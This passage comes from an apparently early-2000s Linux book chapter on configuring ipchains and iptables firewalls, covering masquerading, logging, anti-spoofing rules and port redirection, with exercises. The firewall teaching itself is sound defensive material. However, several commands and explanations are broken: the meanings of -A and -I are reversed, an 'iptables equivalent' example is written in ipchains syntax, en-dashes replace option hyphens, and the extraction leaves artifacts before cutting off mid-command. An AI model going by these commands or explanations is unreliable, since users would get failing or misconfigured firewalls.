remote SMTP servers +(cid:2) Access to the Web, or to certain sites (unproductive or offen- +sive sites) +(cid:2) Access to additional remote TCP/IP services, such as Telnet, +FTP, finger, and so forth +Configuring the Kernel +Most Linux operating systems,such as Red Hat,Slackware,SuSE,and Caldera, +support IP forwarding,masquerading,and firewalling by default.However,you +may have to reconfigure your kernel in order to provide full functionality.When +recompiling the kernel,choose the following option in the Networking section: +Network packet filtering (replaces Ipchains).In the 2.2 and earlier kernels, +check the following Networking options: +(cid:2) Network firewalls +(cid:2) TCP/IP networking +(cid:2) IP accounting +Packet Accounting +Packet accounting is the ability to summarize protocol usage on an IP network. +For example,you can use this feature to list the amount of TCP,ICMP,and IP +traffic that passes through your interfaces.Once you have recompiled the kernel +and restarted your system,find out if the following file is present in the /proc +virtual file system: +/proc/net/ip_acct +If the file exists,then your kernel supports IP accounting,in addition to all +other features.Of course,you may want to check to see if this file exists before +taking the time to recompile the kernel. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 461 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 461 +Understanding Tables and Chains in a +Linux Firewall +Iptables derives its name from the three default tables it uses,which are listed in +Table 9.2.Each interface on your system can have its packets managed and modi- +fied by the chains contained in each of these tables. +Table 9.2 Default Tables and Chains +Table Name Default Chains Description +Filter INPUT Enables you to filter out packets. +FORWARD +OUTPUT +Nat PREROUTING Enables masquerading. +OUTPUT +POSTROUTING +Mangle PREROUTING Allows you to further “mangle” packets +OUTPUT by changing their contents. This feature, +for example, allows you to shape +packets so that they are ready for +certain VPN clients, such as Microsoft +PPTP. +Iptables is an extension of Ipchains,because Iptables adds the nat and mangle +tables.Ipchains uses only the three chains listed in the filter table in Table 9.2. +Thus,with Ipchains,you have access to only the INPUT,FORWARD,and +OUTPUT options.If you want to masquerade using Ipchains,you will use the +--masquerading option for the FORWARD chain.In Iptables,if you want to +filter out packets using,you will use the filter table,and if you want to mas- +querade packets,you will use the nat table.In Iptables,if you do not specify a +table,it will default to the filter table.Now that you understand tables,it is +important to understand the specific chains. +A chain is a series of actions to take on a packet.Whenever you use Ipchains +or Iptables to configure a firewall,the proper perspective to adopt is to view all +packets from the firewall itself.Even more specifically,you should consider all +packets from the perspective of the network interface,the table used,and the spe- +cific chains.For example,if you are using the filter table,each interface on your +network has three different default chains: +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 462 +462 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +(cid:2) INPUT Contains rules that determine what will be done with all +packets that enter this specific interface (i.e.,eth0). +(cid:2) FORWARD For the purposes of this chapter,contains rules that deter- +mine if a packet will be masqueraded. +(cid:2) OUTPUT Contains rules that determine filtering for packets leaving +the interface. +The nat and mangle tables contain two additional chain types.The +PREROUTING chain alters packets when they enter the interface.The +POSTROUTING chain is used for altering packets when they are ready to leave +the host.The POSTROUTING chain is essential to masquerading connections. +Built-In Targets and User-Defined Chains +Ipchains and Iptables use built-in targets to specify the destination of a packet.By +far,the most common built-in targets are DROP and ACCEPT.Table 9.3 +describes each of these in detail.(Additional targets exist.You can read about +them by consulting the Ipchains or Iptables man page.) +Table 9.3 Common Ipchains and Iptables Targets +Target Description +DROP The packet is immediately discarded. The target of REJECT is +also used. +ACCEPT Allows the packet to pass through the rest of the chain. By +default, all default chains are configured to allow any and all +connections. +User-defined chains are often useful if you want to create a large number of +rule entries,but do not want a chain to become too long.Chains that become +too long can slow down the packet,and are also difficult to read and organize. +The following is a sequence where a user defined chain is created,modified,and +then invoked: +ipchains -N custom +ipchains -A custom -s 0/0 -d 0/0 -p icmp -j REJECT +ipchains -A input -s 0/0 -d 0/0 -j custom +This is a trivial example,of course.The -A option “appends”a rule,meaning +that it is placed at the beginning of a chain.The -I option adds the rule to the +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 463 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 463 +end of a chain.The user-defined rule of james is created,and then a rule drop- +ping all ICMP packets is added to this custom chain.Then,a rule is added to the +default input chain that all packets are processed by the custom chain.As a result, +any and all ICMP packets will be dropped.If you were to make the mistake of +forgetting to have the input chain refer to the chain named custom,then the +custom chain would never be read. +In Iptables,the equivalent of the preceding command sequence would be +very similar (it is possible,of course,to create user-defined chains that are much +more ambitious). +ipchains -N custom +ipchains -A custom -s 0/0 -d 0/0 -p icmp -j DROP +ipchains -A input -s 0/0 -d 0/0 -j custom +Specifying Interfaces +If no interface is specified,the first interface (usually eth0) is assumed.If you have +multiple interfaces,you must specify the interface you want to be added to the +chain.Thus,in a multiple-NIC system,when you use the INPUT chain to deny +all ICMP traffic,you must specify the interface.If,for example,you have a system +with two interfaces that allowed all traffic,you would have to issue the following +commands: +ipchains -A input -i eth0 -s 0/0 -d 0/0 –p icmp –j REJECT +ipchains -A input -i eth1 -s 0/0 -d 0/0 –p icmp –j REJECT +Now,this system will not forward ICMP packets on either the eth0 or the +eth1 interface.For Iptables,the commands would be as follows: +iptables -A INPUT -i eth0 -s 0/0 -d 0/0 --protocol icmp --icmp-type +echo-reply –j REJECT +iptables -A INPUT -i eth1 -s 0/0 -d 0/0 --protocol icmp --icmp-type +echo-reply –j REJECT +In both Iptables and Ipchains,the FORWARD chain allows you to specify a +source and destination interface.This is because the FORWARD chain is used to +masquerade connections.Thus,the -i and -o options allow you mark packets +passing between interfaces. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 464 +464 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Setting Policies +Both Ipchains and Iptables default to accepting all connections.The safest option +is to set the default policy to first deny all traffic.You can then create rules to +explicitly allow certain traffic types.You can change this default stance using the +-P option.For example,the following Ipchains command changes the default +policy of the INPUT chain to deny: +ipchains –P input DENY +The following command does the same thing in Iptables: +iptables –P input DROP +To reset the policy to accept,you simply use the ACCEPT target. +Listing Tables and Chains +Once you generate Ipchains or Iptables rules,you can then list them.For +example,the following Ipchains command would list all chains and rules: +ipchains -L +Iptables uses the same command: +iptables -L +You can,if you want,list specific chains: +ipchains -L output +Because Iptables allows you to modify three different tables,you can also list +specific tables.To list all nat chains,you would issue the following command: +iptables -t nat -L +The following command would view only the POSTROUTING chain in +the nat table: +iptables -t nat -L POSTROUTING +Consider the following output from the -L option in Iptables: +iptables -L +Chain INPUT (policy ACCEPT) +target prot opt source destination +custom icmp -- anywhere anywhere +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 465 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 465 +Chain FORWARD (policy ACCEPT) +target prot opt source destination +Chain OUTPUT (policy ACCEPT) +target prot opt source destination +Chain LD (0 references) +target prot opt source destination +Chain custom (1 references) +target prot opt source destination +DROP icmp -- anywhere anywhere +This output shows that the INPUT chain of the filter table contains one rule. +This rule does not block ICMP traffic.Rather,it specifies that all ICMP traffic +will be handled by the custom chain.The custom chain,listed last,does the actual +dropping of all ICMP packets sent to this host. +The following commands allow you to list all of the rules by number: +ipchains --line-numbers -L +iptables --line-numbers -L +Saving, Flushing, and Restoring Rules +Once you have created rules in Ipchains or Iptables,you can save them using the +following commands: +/sbin/ipchains-save +/sbin/iptables-save +These commands are helpful for two reasons.First,you can save the tables +and rules to a text file in order to study them.Second,backing up your rules is +important,as it generally takes considerable time to create the “perfect”firewall +for your situation,and you should keep a backup in case your firewall configura- +tion somehow gets lost.To save your Iptables information to a text file,for +example,you would issue the following command: +/sbin/iptables-save > iptables.txt +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 466 +466 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +NOTE +You should use a package later than Iptables 1.2.1a or later, because it +allows you to use the ipchains-save option. Earlier packages did not +have it. Red Hat 7.1 and later have a compatible version installed. To +install the RPM package on older systems, you need to use the --nodeps +option: +rpm -ivh --nodeps iptables-1.2.1a-1.i386.rpm +To flush any existing rules,you can use the -F option: +ipchains -F +iptables -F +Used without arguments,this command will erase the contents of all rules in +Ipchains,and all rules in the filter table of Iptables.To flush a specific chain,you +would issue the following command(s): +ipchains -F input +iptables -F INPUT +SECURITY ALERT! +Many times, the -F option is used as a safety measure in firewall scripts. +When used at the beginning of a script, it can ensure that the firewall +begins its configuration from “ground zero,” rather than being +appended to an existing firewall configuration. +When creating a firewall script, make sure that you flush all of the +necessary chains and tables. Otherwise, you may end up combining your +configuration with an existing one, which could lead to connectivity or +security problems. +The -F option does not delete rules from either the nat or mangle tables in +Ipchains,however.To delete information from a specific table,you have to specify +the table as follows: +iptables -t nat -F +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 467 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 467 +The -F function does not change a policy from DROP to ACCEPT,either. +You must use the -P option,discussed earlier. +In case you need to restore your backup information,you can use the +following commands: +ipchains-restore +iptables-restore +For example,to restore the Iptables rules database using the iptables.txt file +created earlier,you would issue the following command: +/sbin/iptables-restore iptables.txt +By default,Ipchains-restore will append any restore information to any +existing rules.You can use the -f option to flush out any existing rules,if you +want. +However,the Iptables-restore command automatically erases any existing +Iptables rules whenever it is used.However,you can use the -n option,which +appends the contents of the restore file to any existing rules. +Using Ipchains to Masquerade Connections +The Ipchains command has only one table,and three chains (INPUT, +FORWARD,and OUTPUT).Using the FORWARD chain and the MASQ +target,you can masquerade any IP address you wish.Suppose,for example,that +you have a router that connects the 192.168.1.0/24 network and the +10.100.100.0/24 network.Suppose further that this firewall’s eth0 interface con- +tains the internet-addressable IP address of 66.1.5.1/8.The following Ipchains +command issued on the router would enable both private-IP networks to com- +municate via the Internet: +ipchains –A forward –I eth0 –s 192.168.1.0/24 –j MASQUERADE +ipchains –A forward –I eth0 –s 10.100.100.0/24 –j MASQUERADE +This rule specifies that any connection from the 192.168.1.0/24 and +10.100.100.0/24 networks will be masqueraded as 66.1.5.1/8 on eth0.The -A +option adds the rule to the forward chain,and the -I option specifies the eth0 +interface.The -s option specifies the networks in question. +This particular configuration actually exposes the network.Any remote host +would be able to use your masquerading firewall to access your host.The fol- +lowing additions to the FORWARD chain of the filter table ensures that your +masquerading router masquerades only for your internal network: +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 468 +468 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +ipchains –A forward –s 192.168.1.0/24 –j ACCEPT +ipchains –A forward –d 192.168.1.0/24 –j ACCEPT +ipchains –A forward –s 10.100.100.0/24 –j ACCEPT +ipchains –A forward –d 10.100.100.0/24 –j ACCEPT +ipchains –A forward –j DROP +Iptables Masquerading Modules +Many of the protocols you want to use on the Internet,such as FTP or +RealAudio,require additional support.Iptables provides several modules that +allow masqueraded clients to access these resources.Some of these are described +in Table 9.4. +Table 9.4 Ipchains Masquerading Modules +Module Description +ip_masq_ftp Module for masquerading FTP connections +ip_masq_raudio RealAudio +ip_masq_irc IRC +ip_masq_vdolive For VDO Live +ip_masq_cuseeme CU-See-Me +Enabling these options requires that you use the /sbin/insmod command. +For example,to enable the ip_masq_ftp and ip_masq_raudio modules,you would +issue the following command: +/sbin/insmod ip_masq_ftp +/sbin/insmod ip_masq_raudio +To automate this process,you can place these entries into a script,or into +/etc/rc.local. +Using Iptables to Masquerade Connections +Using the same example of the 192.168.1.0/24 network and the +10.100.100.0/24 network connected by the firewall with the IP address of +66.1.5.1/8,you would use the following command: +iptables –t nat –A POSTROUTING –d ! 192.168.1.0/22 –j MASQUERADE +iptables –t nat –A POSTROUTING –d ! 10.100.100.0/24 –j MASQUERADE +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 469 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 469 +This rule is added to the nat table (-t),and is added to the POSTROUTING +chain (-a).The ! mark tells netfilter/Iptables to masquerade all packets not des- +tined for the internal networks.Specifically,it stipulates that if the packet is not +sent to either the 192.168.1.0/22 or 10.100.100.0/24 network,then the packet +needs to be modified so that it masquerades as the 66.1.5.1/8 IP address. +Consequently,any packet that leaves the interface will be rewritten with the +66.1.5.1/8 address,but packets that stay on the internal network will not be +rewritten.The eth0 interface is assumed by default.If,for some reason,you had +to specify a different interface that has the Internet-routable address,you would +use the -o option: +iptables –t nat –o eth1 –A POSTROUTING –d ! 192.168.1.0/22 +–j MASQUERADE +iptables –t nat –o eth1 –A POSTROUTING –d ! 10.100.100.0/24 +–j MASQUERADE +As with Ipchains,this particular configuration leaves the network wide open. +The following additions to the FORWARD chain of the filter table ensure that +your masquerading router masquerades only for your internal network: +iptables –A FORWARD –s 192.168.1.0/24 –j ACCEPT +iptables –A FORWARD –d 192.168.1.0/24 –j ACCEPT +iptables –A FORWARD –s 10.100.100.0/24 –j ACCEPT +iptables –A FORWARD –d 10.100.100.0/24 –j ACCEPT +iptables –A FORWARD –j DROP +Notice the order of these entries.Both Ipchains and Iptables consider rules in +strict order,which is why the preceding rules first accept certain packets and then +drop all of the rest.If the final entry (iptables -A FORWARD -j DROP) were +listed first,then all packets would be denied. +NOTE +Because both Ipchains and Iptables default to allowing any and all input, +it is quite easy to create rules that inadvertently allow unwanted traffic +to pass through. Some systems administrators prefer to first change the +policy of all rules in all tables to deny. Doing so, however, will require +you to add explicit rules to all affected chains so that your masquerading +will work properly. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 470 +470 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Tools & Traps… +Modem Banks: One Way Around Your Firewall +One of the easiest ways to avoid a firewall is to find and exploit improp- +erly configured modem banks. Many times, modems are configured to +allow access to all areas of the network, and are often not protected or +monitored very closely. As you establish your firewall, consider inspecting +any and all systems for modems. You should approach your modem bank +with the same care and consideration as you would your firewall. +Even modems not configured to receive incoming calls can be a +danger. Consider also that an end user who connects to another net- +work through a modem may be opening up a security breach. For +example, suppose that a user has mapped several drives mapped to a +file server that contains sensitive information. If an end user connects +regularly to a remote dial-up server, it is possible for a malicious user to +discover this connection and gain access to the mapped drives, and +hence to the sensitive information. +Iptables Modules +Table 9.5 lists some of the most commonly used modules for Iptables. +Table 9.5 Iptables Masquerading Modules +Module Description +ipt_tables The module for Iptables support. As with all of these modules, +it is possible to compile the kernel so that all of these modules +are included. +ipt_LOG Support for advanced logging, which includes the ability to +log only initial bursts of traffic, and capture an certain +amount of traffic over a period of time. +ipt_mangle The IP masquerading module. +ipt_nat The NAT module. +You can load these modules using insmod.Iptables masquerades the FTP, +RealAudio,and IRC protocols by default. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 471 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 471 +Exercise: Masquerading Connections +Using Ipchains or Iptables +1. Configure your Linux system with at least two NICs. +2. Enable IP forwarding using the instructions given earlier in this chapter. +3. Using either Ipchains or Iptables,invoke masquerading for your IP +addresses using the instructions given earlier in this chapter. +4. Now,configure the FORWARD chain in the filter table (or just the +FORWARD chain in Ipchains) so that it will masquerade only your +internal hosts. +5. If necessary,load the modules necessary to support FTP,IRC,and +additional protocols. +6. You will likely have to adjust your masquerading settings.Make sure that +you save your settings using the /sbin/ipchains-save command. +Logging Packets at the Firewall +As discussed earlier,the Iptables -l option allows you to log matching packets.You +can insert -l into any rule,as long as you do not interrupt a particular option.For +example,the following command logs all matching TCP packets that are rejected: +ipchains –I input –i eth0 –p tcp –s 0.0.0.0/0 –y –l –j REJECT +However,the following command would be a mistake,because Ipchains +would think that -l is an argument for the source of a packet: +ipchains –I input –i eth0 –p tcp –s –l 0.0.0.0/0 –y –j REJECT +Once you establish logging,you can view Ipchains output in the /var/log/ +messages file. +Iptables allows you to log packets,as well,but in a much more sophisticated +way.This is because Iptables uses the LOG target,which you specify just like +DROP or ACCEPT.For example,to reject and also log all initial TCP traffic,you +would issue the following two commands: +iptables –A INPUT –i eth0 –p tcp –s 0.0.0.0/0 –syn –j LOG +iptables –A INPUT –i eth0 –p tcp –s 0.0.0.0/0 –syn –j DROP +As with Iptables,you can view the results of your logging in the /var/log/ +messages file. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 472 +472 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Setting Log Limits +By default,Iptables will limit logging of packets.The default limit rate is three +logging instances an hour.Each time a logging instance starts,only the first five +packets will be logged by default.This behavior is meant to ensure that log files +do not get too large.You can change the default logging rate by specifying the +--limit and --limit-burst flags.The --limit flag allows you to determine the limit +rate by second,minute,hour,or day.The --limit-burst figure allows you to deter- +mine how many initial packets will be logged.For example,to log ICMP packets +at a rate of two per minute,you would issue the following command: +iptables –A INPUT –i eth0 –p icmp –s 0.0.0.0/0 –-limit 2/min +–-limit-burst 2 –j LOG +Notice also that the limit-burst value is set to 2. +SECURITY ALERT! +Be careful not to log too many packets. You will quickly consume hard +drive space if you log all packets passing through your firewall interfaces. +Adding and Removing Packet Filtering Rules +Thus far,you have created a masquerading router.However,you have not yet +invoked any packet filtering.Following are some examples of packet-filtering +rules you may want to create on your system.First,consider the following +Ipchains and Iptables commands: +ipchains –P input DENY +ipchains –A input –I eth0 –p tcp -s 0/0 –d 0/0 22 –j ACCEPT +Now,consider the equivalent series of Iptables commands: +iptables –P INPUT DROP +iptables –P FORWARD DROP +iptables –A FORWARD –i eth0 –p tcp –-dport 22 –j ACCEPT +These commands effectively prohibit every service from entering your fire- +wall,except for SSH,which uses port 22.No other service can access your net- +work.Notice that Ipchains refers to the input chain in lowercase,whereas Iptables +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 473 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 473 +uses the FORWARD chain in uppercase.Iptables always refers to chains in +uppercase.In addition,Iptables does not use the INPUT chain for packets des- +tined for the internal network.In Iptables,the INPUT chain refers only to +packets destined for the local system.Thus,in Iptables,you should explicitly drop +all packets to the INPUT interface,unless you want to allow access to your fire- +wall,say by SSH or another relatively secure administration method.Your firewall +will still forward packets on the nat table using the FORWARD, +POSTROUTING,and PREROUTING chains. +Notice also that Ipchains uses DENY as a target name,whereas Iptables uses +DROP.The difference is in the way source and destination are specified.This dif- +ference is actually not necessary;both Ipchains and Iptables can use -s and -d,or +the --dport option.When using --dport or --sport,if you do not specify a +source or destination,both Iptables and Ipchains assume the first local interface. +The -I option in Ipchains specifies a particular interface (in this case,the eth0 +interface),whereas in Iptables,the -I option specifies the incoming interface. +The preceding configuration is both extremely simple and restrictive.It +allows outside hosts to access SSH users to access only SSH,and will not allow +any user interactively logged in to the system to check e-mail or any other +Internet-based service.This is because the rule is designed to lock down the fire- +wall as much as possible. +ICMP Types +Notice that with Iptables,you can reject specific ICMP types.Table 9.6 explains +some of the additional types,including the numbers assigned in RFC 792,which +is the document that defines the parameters for all ICMP messages. +Table 9.6 Common ICMP Names and Numbers +Iptables/Ipchains RFC Name and +ICMP Message Name Number Description +echo-request 8 Echo The packet sent out by the +common ping command. +echo-reply 0 Echo Reply The reply a host gives to the +ping command. +destination- 3 Destination Informs an echo request +unreachable Unreachable packet that there is a problem +reaching the intended host. +Continued +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 474 +474 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Table 9.6 Continued +Iptables/Ipchains RFC Name and +ICMP Message Name Number Description +source-quence 4 Source Quench If a router is too busy and +cannot fulfill a client request, +it will send back this message +to a client. +Redirect 5 Redirect Sent by a router that has, +essentially, discovered a more +direct route to the destination +than originally found in the +network packet sent by the +network host. +time-exceeded 11 Time Exceeded If a datagram is held too long +by a router, its time-to-live +(TTL) field expires. When this +occurs, the router is supposed +to send a message back to +the host informing it of the +drop. +parameter-problem 12 Parameter Problem Sent by either standard hosts +or routers, this message +informs other hosts that a +packet cannot be processed. +You can learn about additional arguments by typing iptables -p icmp -h at +any terminal. +A Personal Firewall Example +Suppose that you want to create a personal firewall for a system that you use as a +desktop.You would modify the previous Ipchains commands as follows: +ipchains –P input DENY +ipchains –A input –I eth0 –p tcp -s 0/0 –d 0/0 22 –j ACCEPT +To create a personal firewall system using Iptables,you would issue the +following commands: +iptables –P INPUT DROP +iptables –A INPUT –I eth0 –p tcp –-dport 22 –j ACCEPT +iptables –A INPUT –I eth0 –p tcp –-dport 1023 –j ACCEPT +iptables –A INPUT –I eth0 –p udp –-dport 1023 –j ACCEPT +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 475 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 475 +The preceding commands allow SSH,but no other service.However,now a +user can browse the Web,contact DNS servers,and so forth,and use the system +with a reasonable degree of security.This system now cannot even be pinged, +which helps to protect it against distributed DoS and ping scanning attacks. +Exercise: Creating a Personal Firewall +and Creating a User-Defined Chain +1. Using either Ipchains or Iptables,add the following rules to your +INPUT table to create a personal firewall: +(cid:2) Deny all incoming ICMP traffic,and make sure the denial is logged +(cid:2) Deny all incoming FTP traffic +(cid:2) Deny all incoming DNS traffic +(cid:2) Deny Telnet +(cid:2) Deny SMTP and POP3 +2. If you are using Iptables on a standard system with one interface,you +would issue the following commands: +iptables –A INPUT –s 0/0 –d 0/0 –p icmp –j DROP +iptables –A INPUT –s 0/0 –d 0/0 –p icmp –j LOG +iptables –A INPUT –s 0/0 –d 0/0 –p tcp –-dport 20 –j DROP +iptables –A INPUT –s 0/0 –d 0/0 –p tcp –-dport 21 –j DROP +iptables –A INPUT –s 0/0 –d 0/0 –p tcp –-dport 53 –j DROP +iptables –A INPUT –s 0/0 –d 0/0 –p udp –-dport 53 –j DROP +iptables –A INPUT –s 0/0 –d 0/0 –p tcp –-dport 21 –j DROP +iptables –A INPUT –s 0/0 –d 0/0 –p tcp –-dport 25 –j DROP +iptables –A INPUT –s 0/0 –d 0/0 –p tcp –-dport 110 –j DROP +Of course,there is more than one way to do this.For example,you +could create a user-defined chain and handle all SMTP and POP3 there: +iptables –N icmptraffic +iptables –A icmptraffic –s 0/0 –d 0/0 –p icmp –j DROP +iptables –A icmptraffic –s 0/0 –d 0/0 –p icmp –j LOG +iptables –A INPUT –s 0/0 –d 0/0 –p icmp –j icmp +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 476 +476 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +3. List the INPUT chain.If you created a user-defined chain,list this +as well. +4. Save your configuration for the sake of backup.If you are using Iptables, +use the following command: +iptables-save > iptables.txt +5. Flush all of the rules you created.If you are using Iptables,issue the fol- +lowing command: +iptables –F +6. List the INPUT chain (and any other) to verify that you have in fact +flushed this chain. +7. Use the iptables-restore (or ipchains-restore) command along with the +text file you created to restore your Iptables chains: +iptables-restore iptables.txt +8. List your tables and chains again to verify that your rules have been +restored. +9. Thus far,you have created a personal firewall that starts with a “wide +open”policy,and then proceeds to lock down ports.Now,use the -P +option to block all traffic,and then allow only SSH,or any other pro- +tocol(s) of your choice.If,for example,you are using Iptables,issue the +following commands: +iptables –P INPUT DROP +iptables –A INPUT–p tcp --dport 22 –j ACCEPT +iptables –A INPUT–p tcp --dport 1023: –j ACCEPT +iptables –A INPUT–p udp --dport 1023: –j ACCEPT +You can specify –i eth0,if you wish.However,if you only have one +interface,both Ipchains and Iptables will default to using this interface. +Remember,you should open up the ephemeral TCP and UDP ports so +that you can still do things like checking your e-mail,and so forth.If,of +course,you do not want any services open on your network,you could +omit the --dport 22 line altogether. +10. Now,log all traffic that attempts to connect to your system.If you are +using Iptables,issue the following command: +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 477 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 477 +iptables –A INPUT–p udp --dport 1023: –j LOG +iptables –A INPUT–p tcp --dport 1023: –j LOG +This feature may log too much information for your server, +depending on your system’s activity.Make sure you check your log files +regularly. +11. Log all attempts to scan the standard ports for Microsoft networking.If +you are using Iptables,issue the following command: +iptables –A INPUT–p tcp --multiport --destination-port +135,137,138,139 –j LOG +iptables –A INPUT–p udp --multiport --destination-port +137,138,139 –j LOG +The --multiport --destination-port option allows you to specify +a range of ports.You can read more about these options in the Iptables +man page. +12. If your server needs to support additional protocols,experiment with +adding them. +Redirecting Ports in Ipchains and Iptables +Port redirection is where a packet destined for a certain port (say,port 80) is +received by an interface,and is then sent to another port.Redirecting ports is +common in networks that use proxy servers.To redirect a port in Ipchains to the +local system’s eth0 interface,you could issue the following command: +ipchains –A input –i eth1 –s 0/0 –d 0/0 –p tcp 80 –j REDIRECT 8080 +ipchains –A input –i eth1 –s 0/0 –d 0/0 –p tcp 443 –j REDIRECT 8080 +In Iptables,you must use the REDIRECT target from the nat table: +iptables –t nat -A PREROUTING -i eth1 -s 0/0 -d 0/0 –p +tcp 80 –j REDIRECT / +--to-ports 8080 +iptables –t nat -A PREROUTING -i eth1 -s 0/0 -d 0/0 –p +tcp 443 –j REDIRECT / +--to-ports 8080 +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 478 +478 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +These rules ensure that any hosts that try to bypass your proxy server by +specifying your firewall are redirected to a proxy server on the firewall.Another +strategy is to deny all requests to ports 80 and 443,and then make sure that all +Web clients are configured to access your proxy server. +Configuring a Firewall +Because your situation will be unique,it is impossible to provide a “cookbook” +firewall for you.However,the following is a beginning firewall for a system with +three NICs.The NICs have the following IP addresses: +(cid:2) Eth0 207.1.2.3/24 +(cid:2) Eth1 192.168.1.1/24 +(cid:2) Eth2 10.100.100.1/24 +Thus,Eth0 represents the 207.1.2.0/24 network,Eth1 represents the +192.168.1.0/24 network,and Eth2 represents the 10.100.100.0/24 network.The +intention is to create a firewall that allows the Eth1 and Eth2 networks to com- +municate freely with each other,as well as get on to the Internet and use any ser- +vices (Web,e-mail,FTP,and so forth).However,no one from the Internet should +be able to access internal ports below port 1023.Again,this configuration does +not spend much time limiting egress (i.e.,outbound) traffic.Rather,it focuses on +trying to limit ingress (inbound) traffic.Any of the Ipchains or Iptables com- +mands given in the following sections can be entered into any script,or into a +directory or file such as /etc/rc.d/init.d/ or /etc/rc.d/rc.local.This way,your +rules will be loaded automatically when you reboot your system. +Setting a Proper Foundation +Regardless of whether you are using Ipchains or Iptables,the first thing you will +have to do for your firewall is to flush all existing rules using the -F option. +Then,you need to use the -P option to set the firewall policies to deny all con- +nections by default.The subsequent rules you create will then allow the protocols +you really want.Then,use the necessary commands to enable forwarding and +masquerading,as shown earlier in this chapter.Without this foundation,you will +not be able to forward packets at all,and thus firewalling them would be rather +superfluous. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 479 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 479 +Creating Anti-Spoofing Rules +Many times,a hacker will try to use your firewall as a default gateway and try to +spoof internal packets.If a firewall’s “Internet interface”(i.e.,the one that is +responsible for addressing packets to the Internet) is not configured to explicitly +deny packets from the network,then you are susceptible to this attack.To deny +spoofing,you would issue the following commands,depending on what kernel +you are using: +ipchains -A input -s 192.168.1.0/24 -i eth0 -j deny +ipchains -A input -s 10.100.100.0/24 -i eth0 -j deny +iptables -A FORWARD -s 192.168.1.0/24 -i eth0 -j DROP +iptables -A FORWARD -s 10.100.100.0/24 -i eth0 -j DROP +You may want to log all of the attempts,just so you know how often you +are attacked: +ipchains -A input -s 192.168.1.0/24 -i eth0 -l -j deny +ipchains -A input -s 10.100.100.0/24 -i eth0 -l -j deny +The preceding rules are different only in that they specify the -l option.In +Iptables,create two additional entries to log the traffic: +iptables -A FORWARD -s 192.168.1.0/24 -i eth0 -j LOG +iptables -A FORWARD -s 10.100.100.0/24 -i eth0 -j LOG +Remember,if you have additional interfaces,you have to add a rule for each. +Do not leave one interface open to a spoofing attack.You will be surprised how +quickly a hacker can discover this vulnerability. +Allowing TCP +The following is an example of what you can do with your network when it +comes to allowing inbound and outbound TCP connections.If you are using +Ipchains,issue the following commands to allow TCP connections: +ipchains–A input –p tcp -d 192.16.1.0/24 ! 80 -y –b -j ACCEPT +ipchains–A input –p tcp -d 10.100.100.0/24 ! 80 -y -b -j ACCEPT +The -y option prohibits remote hosts from initiating a connection to any +port except port 80.This is because the “!”character reverses the meaning of +anything that is immediately in front of it.In this case,only connections meant +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 480 +480 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +for port 80 will be allowed;all others will be denied.This may seem strange,but +remember,this rule is for the input chain,and many times these rules seem to be +the reverse of common sense.The -b option “mirrors”the rule,which means that +the rule applies to packets going in both directions.This rule allows one rule to +do the same thing as repeating the command and reversing the source and desti- +nation flags (-s and -d). +If you are using Iptables,issue the following commands: +iptables –A FORWARD –m multiport –p tcp –d 192.168.1.0\24 +--dport 25,110, 80, 443, 53 / +! –tcp flags SYN, ACK ACK -j ACCEPT +iptables –A FORWARD –m multiport –p tcp –s 192.168. 1.0\24 +--sport 25,110, 80, 443,53 / +! –tcp flags SYN, ACK ACK -j ACCEPT +iptables –A FORWARD –m multiport –p tcp –d 10.100.100.0\24 +--dport 25,110, 80, 443, 53 ! / +–tcp flags SYN, ACK ACK -j ACCEPT +iptables –A FORWARD –m multiport –p tcp –s 10.100.100.0\24 +--sport 25,110, 80, 443, 53 ! / +–tcp flags SYN, ACK ACK -j ACCEPT +The preceding rules allow ports to be opened above 1023,as long as they are +continuing a connection that has first been established by a host inside of the +firewall.You can,of course,add additional ports,according to your needs.The / +character is a simple line continuation character that you may have to specify in a +script.As with Ipchains,the ! character reverses the meaning of anything that is in +front of it.In this case,it means that any packet that does not have the SYN, +SYN ACK,or ACK bit set is accepted. +TCP Connections Initiated from Outside the Firewall +You may want to allow certain outside hosts to initiate a connection to your fire- +wall.If you do,you can issue the following commands: +For Ipchains,you would issue the following: +ipchains –A input –p tcp –I eth0 –d 192.168.1.0/24 80 –y –j ACCEPT +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 481 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 481 +The difference between this command and those given previously is that this +one specifies the interface,as opposed to the IP address. +For outgoing connections,you would issue the following: +ipchains –A input –p tcp –i eth0 –d 0/0 –j 